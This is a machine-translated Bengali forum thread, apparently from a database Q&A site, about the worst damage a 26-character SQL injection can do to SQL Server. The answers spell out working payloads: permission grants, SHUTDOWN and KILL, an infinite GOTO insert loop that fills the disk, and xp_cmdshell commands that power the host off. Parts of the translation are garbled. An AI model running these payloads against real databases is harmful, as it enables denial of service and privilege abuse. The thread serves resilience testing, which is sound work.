এসকিউএল সার্ভার ইঞ্জেকশন - 26 টি অক্ষরে কত ক্ষতি?

আমি একটি এসকিউএল সার্ভার ডাটাবেসে ইনজেকশন আক্রমণগুলির বিরুদ্ধে স্থিতিস্থাপকতার জন্য পরীক্ষা করছি।

ডিবিতে থাকা সমস্ত সারণির নামগুলি ছোট হাতের অক্ষর , এবং কোলেশনটি কেস-সংবেদনশীল, লাতিন 1_ জেনারাল_সিএস_এএস ।

আমি যে স্ট্রিংটি প্রেরণ করতে পারি তা বড় হাতের অক্ষরে বাধ্য করা হয়, এবং দৈর্ঘ্যে সর্বাধিক 26 টি বর্ণ হতে পারে। সুতরাং আমি একটি ড্রপ টেবিলে পাঠাতে পারি না কারণ টেবিলের নামটি বড় হাতের অক্ষরে থাকবে এবং এইভাবে জোটের কারণে বিবৃতিটি ব্যর্থ হবে।

সুতরাং - আমি 26 টি অক্ষরে সর্বাধিক ক্ষতি করতে পারি?

সম্পাদনা

আমি প্যারামিটারাইজড কোয়েরি সম্পর্কে আরও জানি এবং আরও - এর আগে কল্পনা করুন যে যে ব্যক্তি যে প্রান্তটি প্রেরণ করার জন্য ক্যোয়ারী তৈরি করেছে তারা এই ক্ষেত্রে প্যারাম ব্যবহার করে নি।

আমি নিস্পৃহ কিছু করার চেষ্টাও করছি না, এটি একই সংস্থার অন্য কারও দ্বারা নির্মিত একটি সিস্টেম।

সহজ:

GRANT EXECUTE TO LowlyDBA

অথবা, আমি অনুমান করি এই ক্ষেত্রে এটি হবে

grant execute to lowlydba 

এটিতে আপনার বিভিন্নতার চয়ন করুন।

সমস্ত সম্ভাবনায় আপনি এখন আপনার বর্তমান সিস্টেমের বিপরীতে এটি পরীক্ষা করতে সক্ষম হতে পারেন, তবে সময়ের সাথে সাথে ডাটাবেসে যে কোনও সংখ্যক ছোটখাটো পরিবর্তন আপনার পরীক্ষাকে অকার্যকর করতে পারে। চরিত্রের স্ট্রিং বদলে যেতে পারে, কেউ ক্ষুদ্র ক্ষুদ্রতর একটি সঞ্চিত প্রক্রিয়া তৈরি করতে পারে যার মধ্যে ধ্বংসাত্মক সম্ভাবনা রয়েছে - যে কোনও কিছুই। আপনি কখনই 100% আত্মবিশ্বাসের সাথে বলতে পারবেন না যে ধ্বংসাত্মক 26 টি চরিত্রের আক্রমণ কেউ তৈরি করতে পারে না।

আমি আপনাকে পরামর্শ দিচ্ছি যে বিকাশকারীকে বেসিক শিল্পের মানক সর্বোত্তম সুরক্ষা অনুশীলনগুলি অনুসরণ করতে পারেন, তবে যদি কেবলমাত্র আমি মনে করি যে কেউ যদি আমার ধারণা ধরে নেয় তবে সুরক্ষা লঙ্ঘন ঘটলে কমপক্ষে আংশিকভাবে দায়বদ্ধ।

সম্পাদনা:

এবং দূষিততা / মজাদার জন্য, আপনি প্রতিটি ট্রেস পতাকা সক্ষম করার চেষ্টা করতে পারেন । এটি পর্যবেক্ষণ করা আকর্ষণীয় হবে। ব্রেন্ট ওজার ব্লগ পোস্টের মতো মনে হয় ...

DBCC TRACEON(xxxx, -1)

SHUTDOWNআদেশ বা KILLযদিও অ্যাকাউন্ট আবেদন প্রশ্নের নির্বাহ আশা এই চালানোর জন্য যথেষ্ট অনুমতি দেওয়া হয় নি কমান্ড (50 একটি র্যান্ডম সংখ্যা বাছাই) উভয় 26 অক্ষরের চেয়ে উল্লেখযোগ্যভাবে কম গ্রহণ।

আপনি এমন একটি টেবিল তৈরি করতে পারেন যা আপনি তারপরে পূরণ করতে পারবেন যতক্ষণ না সময় বা ডিস্কের স্পেস শেষ হয় যতক্ষণ না আগে আসে।

declare @S char(26);

set @S = 'create table t(c char(99))';
exec (@S);

set @S = 'insert t values('''')'
exec (@S);

set @S = 'insert t select c from t'
exec (@S);
exec (@S);
exec (@S);
exec (@S);
-- etc

আপনার ক্ষতির সংজ্ঞা অনুসারে আপনি এটি চালিয়ে যেতে পারেন: ওয়েটফর বিলম্ব '23: 59 'সত্যই খারাপ হতে পারে, আপনি 32,768 ক্লায়েন্টের কাছ থেকে চালনার জন্য লোড-পরীক্ষার সরঞ্জামটি ব্যবহার করতে পারেন।

@ মিকায়েল এরিকসনের উত্তর এবং আমার প্রথম মন্তব্যে @ মার্টিনস্মিতের জবাবের ভিত্তিতে পার্থক্য:

declare @S char(26);

set @S = 'create table x(i int)';
exec (@S);

প্রথমদিকে আমি WHIL স্টেটমেন্টটি করার চেষ্টা করেছি, তবে আমি সবচেয়ে ভাল করতে পারি 27 টি চরিত্র:

set @S = 'while 1=1 insert t select 0'; -- fails at 27 characters
exec (@S);

তবে মার্টিন গোটোকে নির্দেশ করেছেন:

set @S = 'x:insert t select 0 GOTO x';
exec (@S);

গোটো ... সমস্ত অনিষ্টের মূল এবং 26 টি অক্ষরে একটি অসীম লুপ statementোকানো বিবৃতিটির স্রষ্টা।

যা বলেছে ... এটি আরও বেশি জায়গা ব্যবহার করার কারণে ইন্টার এর পরিবর্তে CHAR (99) এর সাথে লেগে থাকা সুবিধাজনক হতে পারে। অন্যান্য বিকল্পগুলি হয় দীর্ঘ নাম ব্যবহার করে এবং 26 টি অক্ষরের সীমাটি ভেঙে দেয় ... বা সারি প্রতি কম স্টোরেজ স্পেস ব্যবহার করবে।

সম্পূর্ণ পরীক্ষার কোড:

declare @S char(26);
set @S = 'drop table t;';
exec (@S);
GO

declare @S char(26);

set @S = 'create table t(c CHAR(99))';
exec (@S);

set @S = 'x:insert t select 0 GOTO x';
exec (@S);
GO

XP_CMDSHELL 'SHUTDOWN -PF'

আপনি পাওয়ার-ডাউনকে কী পরিমাণ ক্ষতিকারক মনে করছেন তার উপর নির্ভরশীল ending :-)

এটির জন্য সার্ভারে এক্সপি_সিএমডিএসেল সক্ষম করা দরকার যা এসকিউএল সার্ভারের শেষ কয়েকটি সংস্করণের ক্ষেত্রে নয়। এটিরও প্রয়োজন যে পরিষেবা অ্যাকাউন্টটির ডানদিকে শাটডাউন রয়েছে যা এটি থাকতে পারে এবং নাও পারে।

এক্সপি_সিএমডি শেল সক্ষম করা সম্ভবত আপনার 26 অক্ষরের সীমা ছাড়িয়ে যাবে। আপনি একাধিক ইনজেকশন অনুমতি দেবেন?

SP_CONFIGURE 'SHOW ADV',1

RECONFIGURE

SP_CONFIGURE 'XP', 1

RECONFIGURE